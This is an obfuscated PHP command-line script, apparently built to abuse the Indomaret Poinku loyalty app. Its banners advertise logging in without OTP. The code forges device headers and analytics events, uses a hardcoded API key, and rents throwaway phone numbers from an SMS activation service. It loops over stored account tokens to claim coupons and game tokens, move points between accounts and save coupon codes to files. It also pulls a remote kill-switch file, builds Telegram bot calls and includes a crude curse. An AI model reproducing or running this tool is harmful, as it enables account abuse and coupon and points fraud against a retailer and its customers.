  LRFDy: 
  if (!($cPDPt == 7)) { 
    goto UI83C; 
  } 
  goto SYacG; 
  p12qk: 
  $U_EVz = @$owfHy["data"][$qtgR3]["subDistrictCode"]; 
  goto gSIFK; 
  Sx3di: 
  echo @ZM6iC("yellow", " 10 . Cek Poin Mu
"); 
  goto fxsrP; 
  Q_oJ7: 
  $yy9BI++; 
  goto HvOW_; 
  wRkJh: 
  echo "
"; 
  goto vxM93; 
  QnwC5: 
  uY9IY: 
  goto z92mg; 
  z_df6: 
  echo @ZM6ic("yellow", "Build By FERDY RAMADHAN "); 
  goto mQ4fU; 
  w7yv5: 
  echo @zM6Ic("yellow", "Status Cek Kupon : "); 
  goto UlQV_; 
  NcukH: 
  die; 
  goto cGhEP; 
  UWw0n: 
  MLXaN: 
  goto jMYW0; 
  ZJ1DV: 
  Wsf05: 
  goto PUuJw; 
  NHckK: 
  RHRij("Kupon Poinku new.txt", $kGhP3); 
  goto iOMaV; 
  Ip1aE: 
  $XTuz1 = g1WXt("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/customer-address/district", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto WHRdx; 
  YgdMG: 
  $u35jw = count($oNl8L) - 1; 
  goto cDfRg; 
  hhb4v: 
  $Ti1xH = z82Db("https://sms-activate.ru/stubs/handler_api.php?api_key=" . $rVPVc . "&action=getBalance"); 
  goto rX35n; 
  w_AWe: 
  $a7K8a = AUJhZ("https://firebaseremoteconfig.googleapis.com/v1/projects/998816605328/namespaces/firebase:fetch", $wDisp, $YYbml); 
  goto w38wp; 
  jtwaS: 
  echo "
"; 
  goto zlztx; 
  OWCKV: 
  JyBDM: 
  goto nSNur; 
  aHo28: 
  curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
  goto Uj__J; 
  OWQhi: 
  $ZNU2M = @$Ap1KM["data"]["rewards"][0]["item"][0]["name"]; 
  goto sPifG; 
  G70pT: 
  TLXym: 
  goto DDFYo; 
  C7yJd: 
  $GOXkU = $w5ulg; 
  goto qhJ96; 
  lhclc: 
  if (!($ZNU2M == '')) { 
    goto ptn8D; 
  } 
  goto WkvW9; 
  cgMr9: 
  echo @ZM6ic("green", "Ada Ayam... Yuk Pecahin !!"); 
  goto seLWO; 
  lzm9A: 
  @unlink("poinhp.php"); 
  goto OBy3d; 
  Epv0S: 
  echo $jTEU0; 
  goto PzxHu; 
  U0P17: 
  goto p1VdQ; 
  goto gvrLt; 
  Bj4_J: 
  print_r($zcN5u); 
  goto mf9wm; 
  TRbuu: 
  $Jk9cx = G8pf2("https://edtsapp.indomaretpoinku.com/configuration/apix-1502-api/mobile/sy-app-version/get-version-key/ANDROID", $aY0el, $GOXkU, $mlMLt); 
  goto uZqPO; 
  c5N7a: 
  $r99Ty = date("Y-m-d"); 
  goto Ghhvp; 
  jX5Xi: 
  echo "\xa"; 
  goto cc9fY; 
  Dydaf: 
  $BcbF3 = @$Ap1KM["data"]["phoneNumber"]; 
  goto YQNNm; 
  ukz32: 
  $yy9BI++; 
  goto oBg1o; 
  q9z4g: 
  $odYyL = @$lImQC["data"]["content"][1]["couponName"]; 
  goto o7RA7; 
  teyF2: 
  goto Gr9uI; 
  goto YHEft; 
  EKWAg: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto sTQjT; 
  o7hXR: 
  echo exec("clear"); 
  goto zVRV9; 
  BV2ez: 
  echo "
"; 
  goto a_Crt; 
  V2WUN: 
  echo @zm6iC("yellow", "Poin Anda : "); 
  goto CX_zf; 
  Phh63: 
  $obc_G = str_replace("
", '', $wlJRC); 
  goto qovaZ; 
  alHDl: 
  echo @zm6Ic("green", " | WA 082176358295 \xa"); 
  goto XKpv9; 
  YrGWs: 
  $wlJRC = xoZB4(array("|"), $wZnHP)[1]; 
  goto QtHtQ; 
  RO2UM: 
  echo $BcbF3; 
  goto fTF4v; 
  U17fx: 
  if (!($fUekS == '')) { 
    goto t27Lz; 
  } 
  goto bzslb; 
  XW71U: 
  cdHjV: 
  goto BkzVQ; 
  J5Yc7: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto mWmUQ; 
  xxJsw: 
  echo "\xa"; 
  goto xcEUm; 
  Oe2Q8: 
  echo "\xa"; 
  goto zf8Zf; 
  iv9jW: 
  $GOXkU = $w5ulg; 
  goto yHDsJ; 
  g8W5n: 
  echo @Zm6ic("yellow", " - Silahkan Melakukan Transaksi Terlebih Dahulu
"); 
  goto iu_7C; 
  YN8f1: 
  N56DQ: 
  goto iDAIJ; 
  mTGZw: 
  $jTEU0++; 
  goto H2AMl; 
  Aj6dX: 
  die; 
  goto vr9Ss; 
  bwQ3Z: 
  echo @Zm6iC("nevy", "Mau Pilih Opsi Mana ? : \xa"); 
  goto EN8OP; 
  BTCr_: 
  echo "
"; 
  goto jBx5X; 
  Q2XZ7: 
  $ofEkP = ZFEbk("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/points/me/protections/enable", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto JVPww; 
  u44Up: 
  echo "
"; 
  goto l5RJI; 
  QjFYm: 
  if (!($cPDPt == 15)) { 
    goto MmeTG; 
  } 
  goto rxDSC; 
  T1pw_: 
  echo @zM6Ic("nevy", " | Script IDM LOGIN POINKU TANPA OTP\xa"); 
  goto rNOFN; 
  oqhQc: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto lzQ4l; 
  IY18O: 
  echo @ZM6Ic("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto e05Ru; 
  QFItA: 
  AUIk1: 
  goto u0xPs; 
  GHDOx: 
  $BcbF3 = @$Ap1KM["data"]["phoneNumber"]; 
  goto DIopi; 
  eaVNA: 
  echo "\xa"; 
  goto TIdh9; 
  zI3JO: 
  echo @ZM6iC("nevy", $xzAuu); 
  goto c2kiA; 
  q16je: 
  echo @Zm6Ic("green", "Nomor HP Anda : "); 
  goto OYd7F; 
  DFm1c: 
  itKyS: 
  goto RPGGf; 
  z_Kbp: 
  goto MLXaN; 
  goto M4H3E; 
  xEaWV: 
  mZtnb: 
  goto Ebtyv; 
  pFm9q: 
  $wZnHP = $lPULW[$jTEU0]; 
  goto fU8RQ; 
  K0_3X: 
  echo "\xa"; 
  goto Cvc4w; 
  gFeB4: 
  echo @ZM6ic("red", "\xa~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\xa"); 
  goto WK8g5; 
  Sxaeu: 
  $Jk9cx = G8Pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto nwHwx; 
  kGfGw: 
  echo "
"; 
  goto wvic1; 
  c_din: 
  $jTEU0++; 
  goto V8mM_; 
  JBjpK: 
  if (!($aoIfK == '')) { 
    goto uY9IY; 
  } 
  goto razQG; 
  vydVo: 
  echo @zM6Ic("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto nLket; 
  GazWF: 
  die; 
  goto KmU4I; 
  J2xt7: 
  $owfHy = json_decode($o0WQD, true); 
  goto Vx4ag; 
  W3gKn: 
  $BW_8H = @$owfHy["data"]["content"][$D2zwh]["description"]; 
  goto PWB9M; 
  ZmzY0: 
  $ABmxY = @$H1g60["message"]; 
  goto DjD3h; 
  DcdsX: 
  @unlink("poinhp.php"); 
  goto ezbM7; 
  SWCTk: 
  echo @zM6iC("nevy", "Akun Ke : "); 
  goto Epv0S; 
  aopGf: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto E3KOs; 
  RhwLr: 
  $sONlZ = str_replace("\xd", '', $rERzL); 
  goto xz1rM; 
  mtQr3: 
  echo @zm6ic("yellow", "Apakah Member Baru : "); 
  goto fITcJ; 
  RufHo: 
  v8B4y: 
  goto h6Wa9; 
  ZH85O: 
  echo @ZM6IC("yellow", "Nama Kuponnya    : "); 
  goto bPh6a; 
  LX2I5: 
  $U0YgX = str_replace("
", '', $zcN5u); 
  goto UBExk; 
  L3UDg: 
  $kp_uF = @$nPb0z["data"]["isNewRegister"]; 
  goto chPVV; 
  MRDOh: 
  $e0XZt = @$owfHy["data"]["content"][$dQ8Tp]["id"]; 
  goto JHJAr; 
  gNfSU: 
  $Ap1KM = json_decode($xT15V, true); 
  goto LuR4F; 
  DsKSR: 
  echo "\xa"; 
  goto p1Olv; 
  wwRMs: 
  $w5ulg = str_replace("\xd", '', $TvVlh); 
  goto fvW7K; 
  RWNRO: 
  echo "
"; 
  goto c4vqT; 
  Qji9l: 
  $lEbop = "https://api.telegram.org/bot" . $egras . "/" . $m9N4q; 
  goto x6Mwb; 
  Y_tV5: 
  ckx1V: 
  goto LXFOH; 
  Y4wH0: 
  $wZnHP = $lPULW[$jTEU0]; 
  goto n0BPz; 
  oPTCR: 
  $XTuz1 = G1wxt("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/customer-address/sub-district", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto FYzej; 
  dgajK: 
  $IBJ55 = trim(file_get_contents("https://irfan.iproute.my.id/ipoinx/medansi/poinnew")); 
  goto RU4S9; 
  PVasB: 
  $XDyMm = @$Ap1KM["data"]["balance"]; 
  goto hgqYy; 
  E30iU: 
  echo "
"; 
  goto GYE_P; 
  u_gnn: 
  $Jk9cx = g8pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto BP2au; 
  FRrum: 
  echo "\xa"; 
  goto p97HD; 
  JEsx3: 
  $ae0GJ = @$gIJCo["ip"]; 
  goto Roi_C; 
  qGj0M: 
  echo "\xa"; 
  goto hJQHr; 
  pKr6T: 
  echo @Zm6ic("nevy", $kp_uF); 
  goto BTCr_; 
  FaMo7: 
  echo "Error deleting {$xp_1p} "; 
  goto jyPnq; 
  xRR6X: 
  echo "
"; 
  goto d1XlT; 
  q9uvU: 
  @unlink("more"); 
  goto s02R6; 
  WTQQC: 
  echo @zM6ic("nevy", "Vertifikasi Handphone Anda => "); 
  goto GhSTa; 
  zVRV9: 
  echo @zM6iC("purple", "\xa~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\xa"); 
  goto af96j; 
  jvFRt: 
  echo @ZM6iC("yellow", "Masukkan Nomor Penerima : "); 
  goto scg4D; 
  c0XOv: 
  echo @zm6ic("yellow", "| WA 082176358295 \xa"); 
  goto VoEDH; 
  YRYVy: 
  $aY0el = $v1ZMX; 
  goto nLPg8; 
  vNWQ0: 
  $w5ulg = str_replace("\xd", '', $TvVlh); 
  goto r13kW; 
  v4kcG: 
  @unlink("poinhp.php"); 
  goto S8Kqs; 
  u06Ti: 
  echo shell_exec("xdg-open "https://barcode.tec-it.com/barcode.ashx?data="" . $p4iky . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto J4PSC; 
  kMtgl: 
  echo "
"; 
  goto a_izq; 
  seTDF: 
  $jTEU0++; 
  goto VB4AI; 
  qj7Ip: 
  sleep(2); 
  goto vT103; 
  nH2G1: 
  echo "
"; 
  goto jveCL; 
  le12b: 
  $SR3ui = @$owfHy["data"]["content"][$D2zwh]["couponCode"]; 
  goto VdnEi; 
  FeWz5: 
  echo @zm6iC("nevy", "Akun Ke    : "); 
  goto UACxr; 
  TcaPp: 
  $ip0vw = trim(fgets(STDIN)); 
  goto GIkxB; 
  V0WMz: 
  @unlink("poinhp.php"); 
  goto jtwaS; 
  x3rSv: 
  die; 
  goto nOS4c; 
  SRJRA: 
  $wDisp = "{"subDistrict":"" . $ldzeo . "","subDistrictCode":"" . $U_EVz . "","value":"" . $xzAuu . ""}"; 
  goto QT4Zl; 
  v1Kc0: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto hEdN_; 
  RYFAp: 
  @unlink("poinhp.php"); 
  goto vg11_; 
  O4vBH: 
  if (!($yy9BI < $DxrJr)) { 
    goto tZ3WW; 
  } 
  goto hrgrJ; 
  qqfT0: 
  echo @zM6IC("nevy", " | Script IDM LOGIN POINKU CEK KUPON TANPA OTP
"); 
  goto MGp32; 
  rYgvk: 
  $tqWr2 = $zvt88[$yy9BI]; 
  goto x8eeS; 
  UuPe7: 
  $N0XGD = G8pf2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/points/me", $aY0el, $GOXkU, $mlMLt); 
  goto t_koI; 
  qvHnx: 
  echo @zm6Ic("nevy", " SEMOGA LOBANG PANTAT NYA BISULAN!!!!! \xa"); 
  goto hiefR; 
  JVPww: 
  $Jk9cx = G8pF2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/reminders/me", $aY0el, $GOXkU, $mlMLt); 
  goto tKy2G; 
  VBlBw: 
  $aY0el = $v1ZMX; 
  goto J7tr_; 
  u3Vxh: 
  echo @ZM6iC("nevy", "        AAMIIN "); 
  goto Rnq3x; 
  J7eiY: 
  $wDisp = "{"appInstanceId":"" . $WYrgv . "","appVersion":"3.13.0","countryCode":"ID","analyticsUserProperties":{},"appId":"1:998816605328:android:" . $aY0el . "","platformVersion":"28","timeZone":"Asia\/Jakarta","sdkVersion":"21.0.1","packageName":"mypoin.indomaret.android","appInstanceIdToken":"" . $YYbml . "","languageCode":"id-ID","appBuild":"104"}"; 
  goto w_AWe; 
  yiSTB: 
  MG_Ix: 
  goto FR1AZ; 
  POucJ: 
  echo @zM6IC("nevy", " SEMOGA LOBANG PANTAT NYA BISULAN!!!!! 
"); 
  goto Wbi8s; 
  c8qjb: 
  NLSP5: 
  goto U90Ts; 
  tB3wy: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto xF8QR; 
  TAFxv: 
  l_zMj: 
  goto ozhcH; 
  LLojs: 
  echo @zM6IC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto Y5g0Z; 
  hrBYg: 
  $nb9cm = round(microtime(true) * 1000); 
  goto AY5hr; 
  cwAz7: 
  echo "
"; 
  goto OMVIC; 
  CXbu3: 
  echo @zM6IC("nevy", "Apakah Sudah Transaksi ? ( y / n ) : "); 
  goto djw9a; 
  Wlwm2: 
  echo "\xa"; 
  goto O32m7; 
  ALYQT: 
  echo @zM6iC("green", "Nama Stamp : "); 
  goto JIw4j; 
  sPifG: 
  $KOeAA = @$Ap1KM["data"]["rewards"][0]["item"][0]["couponMasterId"]; 
  goto HlSVo; 
  iIHZS: 
  function XOZb4($aQRqV, $zcvwi) 
  { 
    goto irlKv; 
    yf8lr: 
    $L_Quo = explode($aQRqV[0], $bkOHh); 
    goto rL9nD; 
    rL9nD: 
    return $L_Quo; 
    goto xZwDa; 
    irlKv: 
    $bkOHh = str_replace($aQRqV, $aQRqV[0], $zcvwi); 
    goto yf8lr; 
    xZwDa: 
  } 
  goto jwtdn; 
  bzslb: 
  echo "
"; 
  goto kSzig; 
  Mf9K6: 
  $pugmZ = @$owfHy["data"][0]["postalCodeId"]; 
  goto JVGPU; 
  oGZ6d: 
  goto q9_1d; 
  goto dIp9f; 
  TcT6g: 
  $kTI3Y = @$owfHy["data"]["content"][$qtgR3]["name"]; 
  goto twt81; 
  CEEHv: 
  echo @zm6Ic("red", $Bz8Et); 
  goto BKuVN; 
  HBhXw: 
  echo @zm6Ic("yellow", "Pesan       : "); 
  goto uLkd3; 
  hCiCJ: 
  $J2jGQ = @$lImQC["data"]["content"][9]["couponName"]; 
  goto WBD6A; 
  iLVbB: 
  echo @ZM6IC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto waCGA; 
  nJUpr: 
  echo "\xa"; 
  goto ymmJo; 
  KBulf: 
  $D2zwh = "0"; 
  goto Od3xN; 
  dVtXf: 
  echo @Zm6Ic("green", $wd9cN); 
  goto GIKee; 
  CV2DM: 
  sKRfM: 
  goto t4bTU; 
  rpmN3: 
  NUgPv: 
  goto TOHQ1; 
  Xn1A1: 
  echo @zM6Ic("nevy", $ZXjwY); 
  goto uIFr_; 
  SxY5K: 
  $efQM2 = count($QRhbE) - 1; 
  goto xSHkO; 
  c1LdE: 
  if ($kkTa0 == "Diskon Rp 25.000 Klik Indomaret") { 
    goto l_zMj; 
  } 
  goto e3Es2; 
  PmTxr: 
  $v1ZMX = str_replace("
", '', $wPFxB); 
  goto VBlBw; 
  SrD9A: 
  function G66Lt($lEbop, $wDisp = null, $aY0el) 
  { 
    goto M_p8e; 
    Q7V8B: 
    if (!$P7lm9) { 
      goto Zz8gX; 
    } 
    goto MefHF; 
    YHgHv: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto VOekd; 
    FMna0: 
    $ruc3h[] = "content-type: application/json; charset=UTF-8"; 
    goto o_xlf; 
    rsfSI: 
    QPvxb: 
    goto yhvt0; 
    yhvt0: 
    $AXlcQ = json_decode($y7f11, true); 
    goto SQbWg; 
    mwS3T: 
    return $ECuqv; 
    goto WxK9R; 
    vmzcK: 
    $ruc3h[] = "user-agent: okhttp/5.0.0-alpha.5"; 
    goto FMna0; 
    Pjohv: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto FC84g; 
    o_xlf: 
    $ruc3h[] = "key: ZWR0czIwMjE6MHBsbW9rbg=="; 
    goto PFQi_; 
    SQbWg: 
    print_r($AXlcQ); 
    goto mwS3T; 
    tsRce: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto vmzcK; 
    neR0v: 
    Zz8gX: 
    goto aBXUE; 
    FC84g: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "klik.txt"); 
    goto cIINo; 
    MefHF: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto YHgHv; 
    aBXUE: 
    return false; 
    goto rsfSI; 
    urfmI: 
    $ECuqv = curl_exec($C6npe); 
    goto zjtAv; 
    PFQi_: 
    $ruc3h[] = "apps: {"app_version":"3.13.0","device_class":"Phone","device_family":"Xiaomi MI 8 SE","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"}"; 
    goto ApU1b; 
    zjtAv: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto Q7V8B; 
    VOekd: 
    goto QPvxb; 
    goto neR0v; 
    KqBlb: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto GH_xy; 
    FRJ5m: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto Pjohv; 
    ApU1b: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto Gc_Vk; 
    M_p8e: 
    $C6npe = curl_init(); 
    goto KqBlb; 
    cIINo: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "klik.txt"); 
    goto urfmI; 
    JGEtc: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto tsRce; 
    Gc_Vk: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto FRJ5m; 
    GH_xy: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto JGEtc; 
    WxK9R: 
  } 
  goto YKNWk; 
  eI2DI: 
  $aY0el = $v1ZMX; 
  goto yjcW3; 
  tVubp: 
  $yy9BI = "0"; 
  goto pDwqG; 
  m4lQE: 
  FIsIZ: 
  goto Ky97d; 
  J75af: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto xdGe6; 
  SZx7v: 
  echo "
"; 
  goto uOP0L; 
  t1_y0: 
  if (!($qtgR3 < $CdOss)) { 
    goto PRokP; 
  } 
  goto eMmIj; 
  oCnIM: 
  @unlink("poinhp.php"); 
  goto EdVpX; 
  Ls8hJ: 
  echo @ZM6IC("yellow", "Build By FERDY RAMADHAN "); 
  goto kTSvg; 
  X7URQ: 
  $YE0oY = g1Wxt("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/pin/check-device", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto v4M4o; 
  fegp5: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"activity_details":"resume_app","event_name":"app_activity","event_timestamp":" . $nb9cm . "},"user":{"session_id":"" . $MXjqh . "","user_ip_address":"127.0.0.1"}}]}"; 
  goto dKfQt; 
  n9Eeq: 
  $m0f8X = explode("
", @file_get_contents("mytoken")); 
  goto jjZVf; 
  CQ6E5: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto X7URQ; 
  q6jGB: 
  echo "\xa"; 
  goto hhb4v; 
  E8UsH: 
  $UHj7C = G8Pf2("https://edtsapp.indomaretpoinku.com/coupon/apix-1502-api/mobile/coupons?unpaged=true", $aY0el, $GOXkU, $mlMLt); 
  goto BWtCh; 
  saptm: 
  $zvt88 = $IKJzx; 
  goto TrDtR; 
  hGBgv: 
  $efQM2 = count($QRhbE) - 1; 
  goto XWLYH; 
  zH0f9: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto EGSUd; 
  LCTSc: 
  if (!($ipfVm == "Diskon Rp 25.000 Klik Indomaret")) { 
    goto se_Kh; 
  } 
  goto SnZeB; 
  fbloW: 
  if (!($XDyMm > $VW5Jc)) { 
    goto I1Quu; 
  } 
  goto janeS; 
  p29CQ: 
  @unlink("poinhp.php"); 
  goto PypTi; 
  Uz1oe: 
  echo "Sampai Baris Ke : "; 
  goto iKYAv; 
  xwqH3: 
  $yy9BI; 
  goto Rd5YL; 
  m4yCF: 
  xCMQT: 
  goto HikpN; 
  rThth: 
  $zvt88 = $QRhbE; 
  goto dz8cU; 
  CDlgR: 
  gcsIa: 
  goto ukz32; 
  CS_fX: 
  $PEd4h = @$lImQC["data"]["content"][3]["couponCode"]; 
  goto TxBje; 
  m5lTp: 
  echo @zM6IC("nevy", "Akun Ke    : "); 
  goto HLOQc; 
  UMXEW: 
  $efQM2 = count($QRhbE) - 1; 
  goto vfw77; 
  s0Zx8: 
  echo @zM6Ic("nevy", $fZ2bz); 
  goto hToI3; 
  R1UzT: 
  $fZ2bz = @$owfHy["message"]; 
  goto P9Ksh; 
  btn19: 
  die; 
  goto gH9aH; 
  NKHpy: 
  $efQM2 = count($QRhbE) - 1; 
  goto cZqL8; 
  XDKb2: 
  echo "\xa"; 
  goto ztfZm; 
  AKHCV: 
  Z7aYS: 
  goto ap7nM; 
  oaNa1: 
  @unlink("beat"); 
  goto AJIdw; 
  syrF8: 
  $wDisp = ''; 
  goto jKd1a; 
  mNOkA: 
  echo @ZM6Ic("yellow", " 17 . Misah Poin \xa"); 
  goto zd5Ut; 
  SzCcE: 
  $mlMLt = @$owfHy["data"]["access_token"]; 
  goto SrfgL; 
  gVY9A: 
  echo "
"; 
  goto VuJbz; 
  uIFr_: 
  echo "\xa"; 
  goto wb7si; 
  H390J: 
  goto FMhwq; 
  goto a8A3B; 
  s332j: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_name":"page_view","event_timestamp":" . $nb9cm . ","page_name":"done registration","page_urlpath":""},"user":{"session_id":"" . $MXjqh . "","user_id":" . $R_bYC . ","user_ip_address":"127.0.0.1"}}]}"; 
  goto cQJu1; 
  d18Bg: 
  $XTuz1 = g1Wxt("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/customer-address/district", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto WGgVd; 
  n0VNS: 
  $nb9cm = round(microtime(true) * 1000); 
  goto mhQEM; 
  Q4cjo: 
  @unlink("poinhp.php"); 
  goto Lw8nc; 
  jPM24: 
  $GOXkU = $w5ulg; 
  goto VJfql; 
  mL6ay: 
  echo @Zm6IC("green", "Produk Ke : "); 
  goto Ix3bF; 
  pH0u8: 
  echo "\xa"; 
  goto Vy9X8; 
  mA_cS: 
  $earOL = $sONlZ; 
  goto h6t4P; 
  Ytgsb: 
  $jTEU0; 
  goto f9zo8; 
  q9Tbh: 
  $S8W9D = trim(fgets(STDIN)); 
  goto zYL9T; 
  hiefR: 
  echo @zM6Ic("nevy", "        AAMIIN "); 
  goto Ud9mO; 
  Lskq2: 
  BLHdg($ZNU2M . ".txt", $SR3ui); 
  goto VE8z4; 
  a5NNa: 
  $tqWr2 = $zvt88[$yy9BI]; 
  goto dXHQv; 
  Cqx0O: 
  echo "
"; 
  goto MZ50d; 
  S0J70: 
  echo "
"; 
  goto lDBc5; 
  v81hS: 
  if (!($jTEU0 < $S8W9D)) { 
    goto SXxFu; 
  } 
  goto vZzSz; 
  uTH7V: 
  if (!($zn5zd == '')) { 
    goto cEejp; 
  } 
  goto NCHVJ; 
  BWtCh: 
  $lImQC = json_decode($UHj7C, true); 
  goto QScqr; 
  za0pO: 
  NlIKW: 
  goto YUJaT; 
  z7JlD: 
  ZqS2R: 
  goto xsgCP; 
  lHXVb: 
  goto jOsQR; 
  goto sMCF1; 
  betTY: 
  $w5ulg = str_replace("
", '', $TvVlh); 
  goto jPM24; 
  bVfIJ: 
  echo $jTEU0; 
  goto qGj0M; 
  pHOIf: 
  $nb9cm = round(microtime(true) * 1000); 
  goto N2c3X; 
  jmvmq: 
  echo "
"; 
  goto Xv3BQ; 
  pllF8: 
  mns5n: 
  goto N6fB1; 
  X2LRu: 
  echo "
"; 
  goto TGE3V; 
  yqfrR: 
  CjBGa: 
  goto VEc6T; 
  zLIQ0: 
  KwD0u: 
  goto NoCuK; 
  WxP0S: 
  die; 
  goto UiL6h; 
  QfkH3: 
  $aoIfK = trim(fgets(STDIN)); 
  goto oFqKn; 
  iqj0r: 
  $zcN5u = xOZb4(array("|"), $tqWr2)[0]; 
  goto EEf2f; 
  PprMi: 
  sleep(2); 
  goto HTPsC; 
  GLRDO: 
  $ofEkP = CWALz("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/coins/prizes/GOFRESH2022/tokens/claim/single", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto wOHaA; 
  ybqqp: 
  $earOL = "112233"; 
  goto cjw3d; 
  S9Ofg: 
  $cQFRW = json_decode($ofEkP, true); 
  goto wK3qQ; 
  KGBSP: 
  gp62g: 
  goto CQ6E5; 
  cERjc: 
  if (!($fUekS == '')) { 
    goto Oer0B; 
  } 
  goto VaxP_; 
  PKPd6: 
  echo @Zm6Ic("nevy", "Apakah Sudah Transaksi ? ( y / n ) : "); 
  goto ug1iK; 
  bPh6a: 
  echo @zM6ic("nevy", $ZNU2M); 
  goto TQVo8; 
  ecjm5: 
  $KOeAA = @$Ap1KM["data"]["rewards"][0]["item"][0]["couponMasterId"]; 
  goto igLYC; 
  J9oHK: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto e2ITP; 
  P7yvx: 
  echo "\xa"; 
  goto csAPf; 
  rjtX2: 
  rhRiJ("Kupon Poinku new.txt", $KTLep); 
  goto we6J2; 
  q3mFb: 
  $EghiE = curl_getinfo($C6npe, CURLINFO_HTTP_CODE); 
  goto xn_1c; 
  SFR6C: 
  $upOL9 = G8PF2("https://edtsapp.indomaretpoinku.com/%2Fgame%2Fapix-1502-api%2Fcustomer-game%2Fget-count-unused-game", $aY0el, $GOXkU, $mlMLt); 
  goto HENgQ; 
  qf0ET: 
  echo "
"; 
  goto kyIGl; 
  wboPA: 
  $yy9BI++; 
  goto FQhy9; 
  QDAIS: 
  echo "
"; 
  goto LtxpM; 
  r_9O3: 
  echo "
"; 
  goto Tj0tS; 
  QyKc9: 
  $m5BZY = Gggr_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto TiDu9; 
  gUQAz: 
  goto XUxU1; 
  goto A0jWl; 
  u_8of: 
  if (!($fUekS == '')) { 
    goto NYs__; 
  } 
  goto TDGwf; 
  wE6Ao: 
  function JYokI($FK_yc, $bQedf, $p5fm4) 
  { 
    goto Spqpl; 
    cfkIp: 
    fclose($FhLCi); 
    goto KozWT; 
    EylOY: 
    fputs($FhLCi, "{$bQedf} kupon {$p5fm4}\xa"); 
    goto cfkIp; 
    Spqpl: 
    $FhLCi = fopen($FK_yc, "a"); 
    goto EylOY; 
    KozWT: 
  } 
  goto JCfF7; 
  xaeG2: 
  tVK8J: 
  goto nb0l8; 
  kspMc: 
  goto Q7LGl; 
  goto pn_Dn; 
  xF8QR: 
  echo @ZM6ic("green", $wd9cN); 
  goto LH0vW; 
  DA1mz: 
  $wlJRC = XoZb4(array("|"), $wZnHP)[1]; 
  goto fuGBB; 
  MURce: 
  $Jzh8Y = strtotime("+7 days", strtotime($fUekS)); 
  goto prGIN; 
  PInYa: 
  echo @ZM6iC("yellow", "Build By FERDY RAMADHAN "); 
  goto XOW5Q; 
  HOz1w: 
  $J0Fkh = @$owfHy["data"]["content"][$fM3_G]["quota"]; 
  goto RQ7nA; 
  BGYQ7: 
  $wlJRC = XOZB4(array("|"), $wZnHP)[1]; 
  goto zayXM; 
  wEyFg: 
  $hwqq9 = ThHfS("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/pin/check-device", $wDisp, $aY0el, $GOXkU); 
  goto eQth1; 
  EnqxC: 
  $nb9cm = round(microtime(true) * 1000); 
  goto OaVT1; 
  MK_kh: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto Rw6sZ; 
  l0tTh: 
  echo "
"; 
  goto Bneb2; 
  KTj7C: 
